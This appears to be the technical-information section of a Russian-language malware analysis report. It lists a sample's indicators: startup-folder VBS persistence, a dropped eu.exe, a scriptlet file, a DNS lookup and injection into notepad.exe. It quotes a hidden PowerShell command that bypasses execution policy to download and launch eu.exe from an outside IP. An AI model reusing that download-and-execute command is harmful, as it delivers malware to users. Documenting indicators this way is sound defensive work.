Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\stat.vbs
- http://46.##3.221.147/eu.exe как %appdata%\eu.exe
- %WINDIR%\syswow64\notepad.exe
- eu.exe
- %TEMP%\abctfhghghghghВЈ.sct
- %APPDATA%\eu.exe
- http://46.##3.221.147/eu.exe
- DNS ASK BN####.PUBLICVM.COM
- '%APPDATA%\eu.exe'
- '%APPDATA%\eu.exe' 2 1008 1107203
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://46.##3.221.147/eu.exe','%APPDATA%\eu.exe');Start-Process '%APPDATA%\eu...' (со скрытым окном)
- '%WINDIR%\syswow64\notepad.exe'